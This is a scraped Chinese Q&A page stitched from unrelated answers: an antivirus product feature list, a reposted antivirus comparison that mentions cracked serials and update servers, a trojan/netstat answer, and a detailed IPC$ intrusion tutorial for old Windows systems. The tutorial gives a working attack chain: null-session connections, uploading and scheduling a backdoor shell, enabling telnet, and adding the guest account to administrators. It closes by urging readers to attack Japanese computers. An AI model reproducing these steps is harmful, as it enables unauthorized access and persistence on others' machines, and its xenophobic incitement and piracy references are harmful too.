目前国内唯一采用Linux图形界面 *** 应急杀毒程序，界面与Windows界面几乎没有区别。用户只需用瑞星杀毒软件2006版的安装光盘启动计算机即可彻底查杀Windows包括NTFS分区在内的所有分区格式，确保用户计算机不留安全死角。

1.3.20 全新瑞星注册表修复工具

快速修复被病毒、恶意网页篡改的注册表内容，排除故障，保障系统安全稳定。改进的注册表修复工具可以自动对系统注册表关键项目进行备份，防止被病毒或用户误操作破坏。

1.3.21 嵌入式杀毒

嵌入式杀毒可以在MS Office 2000及其以上版本的文档在打开之前对该文件进行查毒，将宏病毒封杀在宏启动之前。同时，嵌入式杀毒还可以对 IE 5.0及其以上版本下载的控件在本地运行之前先行查毒，杜绝恶意代码通过 IE 下载的控件进行传播。

1.3.22 屏保杀毒

通过屏保杀毒功能，计算机会在运行屏幕保护程序的同时，启动瑞星杀毒软件进行后台杀毒，充分利用计算机空闲时间。

1.3.23 日志管理系统

瑞星杀毒软件2006版重新编写了日志管理系统，使其更加直观、条理化、人性化。使日常操作和查杀毒操作记录一目了然，方便用户日后的查找和统计。

1.3.24 支持多种压缩格式

瑞星杀毒软件2006版支持 DOS、Windows、UNIX 等系统的几十种压缩格式，如ZIP、GZIP、ARJ、CAB、RAR、ZOO、ARC、7-ZIP等，使得病毒无处藏身，并且支持多重压缩以及对ZIP、RAR、ARJ、ARC、LZH、7-ZIP等多种压缩包内文件的杀毒。

1.3.25 内嵌信息中心

在Internet连接状态下，程序的主界面会自动获取瑞星网站公布的最新信息。诸如重大病毒疫情预警、最新安全漏洞和安全资讯等信息，用户能及时做好相应的预防措施。

1.3.26 个性化界面，人性化操作

内置四套界面皮肤，用户可以随时更换，使用户拥有一个个性化的杀毒软件。瑞星杀毒软件2006版采用向导式设置，保证功能强大的同时，极大地体现软件的人性化。

1.3.27 自动语言配置

根据用户系统采用的默认语言，瑞星杀毒软件2006版能自动进行语言配置，以显示相应语言的界面。同时，瑞星杀毒软件2006版还实现了实时转换界面语言的功能，在菜单中进行语言选择后，相应语言界面立即生效。

回答者：lvshujin - 经理 四级 1-13 15:30

--------------------------------------------------------------------------------

那就转一个文章你看看吧．写的很好

全球著名杀毒软件使用经验谈（转载）

国内外现在杀毒软件非常的多，让人无从下手。下面的文章作者笔者结合自己的使用经验介绍一下这些软件的主要特点，也供你选择。

我的机器基本配置:

p4 m1。8G

256m+512m内存

winxp sp2

下面我们先来看看最新的杀毒软件病毒阻杀率排行榜

杀毒软件 病毒阻杀率

Kaspersky Personal Pro version 5.0 97.93%

AVK version 15.0.5 93%

F-Secure 2005 97.55%

eScan Virus Control version 96.75%

Norton Corporate version 91.64%

Norton Professional version 2005 91.57%

McAfee version 9.0 89.75%

Virus Chaser version 5.0 88.31%

BitDefender version 8.0 88.13%

CyberScrub version 87.87%

Panda Platinum 2005 87.75%

version 75%

Arcavir 87.73%

MKS_VIR 2005 87.70%

RAV version 87.26%

F-Prot version 87.07%

先来说说国产的，三足鼎立的瑞星、金山、江民这三款杀毒软件的使用经验：

金山毒霸

我是金山毒霸的正版用户。选择金山当时是同学怂恿的，购买的金山毒霸5，一直升级到现在的组合套装2005，感觉功能好比傻瓜相机，占内存不大，启动也很快，我觉得对于一般的家庭用户，这些已经够用了，使用至今没有被病毒困扰过，只是在冲击波的时候有些麻烦，但是它的防火墙-金山网镖，我不说他的效果如何，老是容易cpu彪升到100%，这是很让人难以接受的，目前还没有解决这个问题，所以我以前用天网防火墙搭配，但是大家知道，天网现在没有真正的破解，前面几个版本老是第二次拨号时无法上网，只有重启以后才行。而且国内的防火墙都是通过不断升级ip规则来实现功能的，代表国内防火墙更高水平的天网亦是如此，而国外的防火墙不是频繁升级的，这是技术上的差距。

瑞星杀毒软件

第二是瑞星，瑞星2005我用过一段时间，界面比较朴实，有个对瑞星情有独钟的同学，给了我一个他不知道哪里来的序列号和id，大部分情况下能升级。启动也比较快，内存占用也还可以，常驻内存程序比较丰富。

江民杀毒软件

第三是江民，江民在网上的评价还是比较高的，界面不错，有个同学使用的正版江民感觉比较专业，启动比较快，占内存还可以，他搭配的是天网，运行状况令人满意。个人感觉，国产更佳搭配-江民+天网。

再来说说国外的卡巴斯基、诺顿、MacAfee、F-SECURE、nod32，其中卡巴斯基，macfee，诺顿又被誉为世界三大杀毒软件！

卡巴斯基

在国内卡巴斯基不像诺顿那样有名，可能许多人还比较陌生，在这里重点介绍下。卡巴斯基总部设在俄罗斯首都莫斯科，Kaspersky Labs是国际著名的信息安全领导厂商。公司为个人用户、企业 *** 提供反病毒、防黒客和反垃圾邮件产品。经过十四年与计算机病毒的战斗，卡巴斯基获得了独特的知识和技术，使得卡巴斯基成为了病毒防卫的技术领导者和专家。该公司的旗舰产品-著名的卡巴斯基反病毒软件（Kaspersky Anti-Virus,原名AVP）被众多计算机专业媒体及反病毒专业评测机构誉为病毒防护的更佳产品。 1989年，Eugene Kaspersky开始研究计算机病毒现象。从1991年到1997年，他在俄罗斯大型计算机公司“KAMI”的信息技术中心，带领一批助手研发出了AVP反病毒程序。Kaspersky Lab于1997年成立，Eugene Kaspersky是创始人之一。

2000年11月，AVP更名为Kaspersky Anti-Virus。Eugene Kaspersky是计算机反病毒研究员协会(CARO)的成员，该协会的成员都是国际顶级的反病毒专家。AVP的反病毒引擎和病毒库，一直以其严谨的结构、彻底的查杀能力为业界称道。 俄罗斯杀毒软件之所以非常强大，是因为俄罗斯有国际顶尖的数理科技领域的特殊人才及优良的传统，这些专业人才的培养不是三年两载就能成功的。卡巴斯基基本都是一年破解升级，杀毒能力天下之一，你也看到了世界排行之一名，感觉专业就是专业，但是监控能力差了点，而且用起来一个字"卡"，很占内存，无论时搭配自带的卡巴斯基防火墙还是ZA防火墙启动都比较慢，也许是因为太专业的原因吧，如果你实在害怕病毒，而且喜欢玩专业，愿意牺牲性能换来安全，你就用ZA搭配卡巴斯基吧!

诺顿杀毒软件

诺顿，诺顿大家很熟悉，老实说诺顿的广告宣传还真是不错的，但是大家注意，别看广告，看疗效！也是一年破解升级几年前叱诧风云的软毒软件，功能强大，当然诺顿企业版要比个人版本的杀毒能力更强悍，建议大家使用9.0版的，最新10.0版占用资源有点大，不算完美。但是如果你使用诺顿公司的 *** 产品，systemworks+安全特警，你会发现比蜗牛还慢，启动超慢(比卡巴斯基还慢)，我实在搞不懂，一个杀毒软件，p4 1。8G 700多M的配置用起来都卡，还有什么意义?所以还是上面那句话，如果你愿意牺牲性能换来安全，你就用ZA搭配卡巴斯基吧!，因为同样牺牲性能，卡巴斯基比诺顿好很多!

McAfee杀毒软件

简单注册可以获得一年正版升级，是我现在使用的杀毒软件，安全特警套件里面乱七八糟的东西很多，包括六个组件：1：McAfee VirusScan-反病毒系统；2：McAfee Personal Firewall Plus-个人防火墙增强版；3：McAfee SpamKiller-垃圾邮件过滤器；4：McAfee Privacy Service-免干扰服务，使孩子和家庭成员远离网上的有害信息；5：Identity Protection-身份和财务信息防护功能；6：Spyware/Adware Detection and Removal-间谍/广告软件监视和删除功能；7：Pop-Up Blocking-弹出窗口屏蔽功能；8：McAfee Shredder-文件粉碎机，彻底删除可能被他人找回并利用的信息。很多雷同的我只安装了之一和第二个。足够用了，占内存不多，启动较快，比金山慢一点。杀毒能力没有卡巴斯基好，系而统监控恰恰是做的更好的，界面还好。

Nod32

nod32，微软御用了四年的杀毒软件，自然不差，启动较快，占资源超少，多次获得权威大奖，我使用以后觉得唯一的缺点是升级很慢，很难，能升级的基本都是国内院校的破解服务器，而官方服务器升级很慢。

F-SECURE

F-SECURE可能知道的人很少，别说用的人了，呵呵。我自己现在用的杀软就是这款，其实这款杀毒软件名气是相当响的。来自芬兰的杀毒软件， *** AVP,LIBRA,ORION,DRACO四套杀毒引擎,其中一个就是Kaspersky的杀毒内核，而且青出于蓝胜于蓝，个人感觉杀毒效率比Kaspersky要好，对 *** 流行病毒尤其有效。在《PC Utilites》评测中超过Kaspersky名列之一。该软件采用分布式防火墙技术。f-secure 曾经超过Kaspersky，排名之一，但后来Kaspersky增加了扩展病毒库，反超f-secure 。鉴于普通用户用不到扩展病毒库，因此f-secure还是普通用户很不错的一个选择。所以我用下来的感觉就是F-SECURE的综合能力可以排之一名！但是这个软件也有不足，就是进程太多，要近15个进程，呵呵，谁叫它有四套杀毒引擎呢？不过也够安全吧。进程虽多，却一点不觉得卡！

国外杀毒软件一般推荐咖啡套装，如果机子实在太好，愿意牺牲性能，对安全有特殊要求的请使用ZA+卡巴斯基单机版。

有的朋友问我一个杀毒软件保险吗，要不要装两个来个双保险，呵呵，对于这个我觉得是可行的，但是前提是你对杀毒软件的各项设置要比较了解而且自己的电脑配置要高档点，否则不是系统容易崩溃就是电脑被两个杀毒软件拖垮的。比较典型的例子就是卡巴斯基＋KV2005的组合，很显然卡巴斯基系统监控的不足由KV2005来弥补。卡巴斯基只负责杀毒即可了。但是这个豪华组合要牺牲很多内存，你电脑够劲的话可以试试。另外卡巴斯基加NOD32也是不错的搭配，NOD32查毒和监控方面都不错，而且查毒速度奇快，内存占用很小，这样你可以用NOD32进行查毒，大家都知道卡巴斯基的查毒速度是很慢的，因为病毒库多啊，每个文件都要那13W病毒库去套，能不慢嘛！

有的朋友关心哪个杀毒软件病毒库多哪个就牛，呵呵，大家都以为卡巴斯基病毒库很多是伐，现在大概13万4千左右吧，但是面对罗马尼亚的杀软BitDefender Professional近20W的病毒库，卡巴斯基一边凉快去吧。所以BitDefender Professional在2005年一些网站的测试中取得过之一名的成绩。但是病毒库多并不能说明问题，实际杀毒能力BitDefenderProfessional并没有比卡巴斯基更好，所以这个也是大家理解的误区！有人认为卡巴斯基病毒库升级极其迅速所以最牛，虽然卡巴斯基每小时都有升级，很频繁，但是很多病毒库都非最终版，也就是很容易出现误报现象，所以建议大家到周末的时候再升级自己的卡巴斯基，因为周末是卡巴斯基整理一周病毒库，删除错误病毒库的时候。

还有有的朋友认为杀毒软件只要杀毒厉害就是一流的，其实这种观点我认为也不对，比如macfee，它其实杀毒并没有怎么厉害，肯定没有卡巴斯基那么野蛮，但是为什么它也拥有广泛的用户群，有很好的口碑，很显然macfee的监控做的很完美，可以说滴水不漏，监控这么好的杀软%C

黑客病毒能否对电脑进行远程控制？

你好，如果说你电脑中发现了木马病毒，只要其中有一个是远程控制型木马，那么黑客就能对你的电脑进行远程控制，你的电脑就相当于安装了一个客户端程序，对方可以对你的电脑任意进行操作，包括截取你的电脑屏幕，运行任意程序，甚至能够截取你通过键盘输入的帐号密码等等。

如果你要通过命令行得知当前连接到哪些IP地址，可以输入netstat -ano，你就可以看到本地计算机的IP地址及连接时所使用的端口号，连接到的外部计算机的IP地址及端口号，监听状态及对应进程的PID值。其中-a参数表示显示所有连接的监听的端口，-n参数表示以数字形式表示IP地址和端口号，-o参数表示显示拥有的与每个连接关联的进程的PID值。你重点检查连接状态为LISTENING及ESTABLISHED状态的，LISTENING表示监听中，ESTABLISHED表示已经建立了连接。

只是这样查看其实很累，最主要是你需将每个进程的PID值与任务管理器中每个进程的PID值对应起来，并且还要判断这个进程是否安全。这事何不交给腾讯电脑管家？你在电脑管家右下角点击工具箱，然后点击 *** 连接，可以获取与netstat -ano命令同样详尽的信息，还直接把进程名称给显示出来了，同时能够显示这个进程是否安全。

你也说电脑中了木马病毒，你也可以在“杀毒”选项中点击全盘查杀进行一次深度的查杀。不要小看电脑管家的杀毒能力，它连续数次通过VB100、AV-C等五项国际权威认证可以视为一个佐证，其所拥有的4+1核心杀毒引擎再加之所运用的CPU虚拟执行技术，更使其能够深入查杀病毒木马，并根本顽固病毒。它所默认开启的上网安全防护、应用入口防护和系统底层防护也能够帮助你抵御 *** 风险，保护你的上网安全。

如果你还有其它电脑问题，欢迎你在电脑管家企业平台提出，我们将尽力为你解答。

黑客DOS命令或其它命令入侵他人电脑的具体步骤?

IPC$入侵

一 唠叨一下：

网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄.

不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于之一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在的疑惑有多少).

因此我写了这篇相当于解惑的教程.想把一些容易混淆,容易迷惑人的问题说清楚,让大家不要总徘徊在原地!如果你看完这篇帖子仍有疑问,请马上回复!

二 什么是ipc$

IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的)，它是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。

利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的)，而利用这个空的连接，连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。

我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程 *** 登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。

所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$，访问共享资源,导出用户列表,并使用一些字典工具，进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的.

解惑:

1)IPC连接是Windows NT及以上系统中特有的远程 *** 登陆功能，其功能相当于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函数，所以不能在Windows 9.x中运行。

也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋友说在98下能建立空的连接,不知道是真是假,不过现在都2003年了,建议98的同志换一下系统吧,98不爽的)

2)即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接

3)并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表

三 建立ipc$连接在hack攻击中的作用

就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,就不用我在多说了吧,what u want,u can do!!

(基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是2000server，还可以考虑开启终端服务方便控制.怎么样?够厉害吧!)

不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的:(

因此今后你更大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现ipc$连接并不是万能的,甚至在主机不开启ipc$共享时,你根本就无法连接.

所以我认为,你不要把ipc$入侵当作终极武器,不要认为它战无不胜,它就像是足球场上射门前的传球,很少会有致命一击的效果,但却是不可缺少的,我觉得这才是ipc$连接在hack入侵中的意义所在.

四 ipc$与空连接,139,445端口,默认共享的关系

以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)

1)ipc$与空连接:

不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.

许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).

2)ipc$与139,445端口:

ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.

3)ipc$与默认共享

默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)

五 ipc$连接失败的原因

以下5个原因是比较常见的:

1)你的系统不是NT或以上操作系统;

2)对方没有打开ipc$默认共享

3)对方未开启139或445端口(惑被防火墙屏蔽)

4)你的命令输入有误(比如缺少了空格等)

5)用户名或密码错误(空连接当然无所谓了)

另外,你也可以根据返回的错误号分析原因：

错误号5，拒绝访问 ： 很可能你使用的用户不是管理员权限的，先提升权限；

错误号51，Windows 无法找到 *** 路径 : *** 有问题；

错误号53，找不到 *** 路径 ： ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）；

错误号67，找不到 *** 名 ： 你的lanmanworkstation服务未启动；目标删除了ipc$；

错误号1219，提供的凭据与已存在的凭据集冲突 ： 你已经和对方建立了一个ipc$，请删除再连。

错误号1326，未知的用户名或错误密码 ： 原因很明显了；

错误号1792，试图登录，但是 *** 登录服务没有启动 ： 目标NetLogon服务未启动。（连接域控会出现此情况）

错误号2242，此用户的密码已经过期 ： 目标有帐号策略，强制定期要求更改密码。

关于ipc$连不上的问题比较复杂，除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就靠大家自己体会和试验了.

六 如何打开目标的IPC$(此段引自相关文章)

首先你需要获得一个不依赖于ipc$的shell，比如sql的cmd扩展、telnet、木马,当然，这shell必须是admin权限的,然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上面可以知道，ipc$能否使用还有很多条件。请确认相关服务都已运行，没有就启动它（不知道怎么做的请看net命令的用法）,还是不行的话（比如有防火墙，杀不了）建议放弃。

七 如何防范ipc$入侵

1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)

首先运行regedit，找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为：00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)

2禁止默认共享

1）察看本地共享资源

运行-cmd-输入net share

2）删除共享(每次输入一个）

net share ipc$ /delete

net share admin$ /delete

net share c$ /delete

net share d$ /delete（如果有e,f,……可以继续删除）

3）停止server服务

net stop server /y （重新启动后server服务会重新开启）

4）修改注册表

运行-regedit

server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer（DWORD）的键值改为:00000000。

pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks（DWORD）的键值改为:00000000。

如果上面所说的主键不存在，就新建(右击-新建-双字节值）一个主健再改键值。

3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务

控制面板-管理工具-服务-找到server服务（右击）-属性-常规-启动类型-已禁用

4安装防火墙(选中相关设置)，或者端口过滤(滤掉139,445等),或者用新版本的优化大师

5设置复杂密码，防止通过ipc$穷举密码

（本教程不定期更新，欲获得最新版本，请登陆官方网站：菜菜鸟社区原创）

八 相关命令

1)建立空连接:

net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)

2)建立非空连接:

net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)

3)映射默认共享:

net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘，其他盘类推)

如果已经和目标建立了ipc$，则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$

4)删除一个ipc$连接

net use \\IP\ipc$ /del

5)删除共享映射

net use c: /del 删除映射的c盘，其他盘类推

net use * /del 删除全部,会有提示要求按y确认

九 经典入侵模式

这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)

1. C:\net use \\127.0.0.1\IPC$ "" /user:"admintitrators"

这是用《流光》扫到的用户名是administrators，密码为"空"的IP地址(空口令?哇,运气好到家了)，如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为"空"，所以之一个引号处就不用输入，后面一个双引号里的是用户名，输入administrators，命令即可成功完成。

2. C:\copy srv.exe \\127.0.0.1\admin$

先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin用户的c:\winnt\system32\，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。

3. C:\net time \\127.0.0.1

查查时间，发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00，命令成功完成。

4. C:\at \\127.0.0.1 11:05 srv.exe

用at命令启动srv.exe吧（这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵！）

5. C:\net time \\127.0.0.1

再查查到时间没有？如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05，那就准备开始下面的命令。

6. C:\telnet 127.0.0.1 99

这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。

虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了

7.C:\copy ntlm.exe \\127.0.0.1\admin$

用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在《流光》的Tools目录中）。

8. C:\WINNT\system32ntlm

输入ntlm启动（这里的C:\WINNT\system32指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行）。当出现"DONE"的时候，就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务！

9. Telnet 127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作一样简单！(然后你想做什么?想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组

10. C:\net user guest /active:yes

将对方的Guest用户激活

11. C:\net user guest 1234

将Guest的密码改为1234,或者你要设定的密码

12. C:\net localgroup administrators guest /add

将Guest变为Administrator^_^(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问这台计算机)

十 总结:

关于ipc入侵就说这么多了,觉得已经够详细了,如果有不准确的地方,希望能与大家讨论.

最后,希望大家不要随便入侵,我写这篇文章的目的是想解答大家的疑惑,并不是鼓励大家随便的入侵,如果你非想试一下,建议拿小日本的机子开练(什么?为什么?因为我讨厌日本,没别的)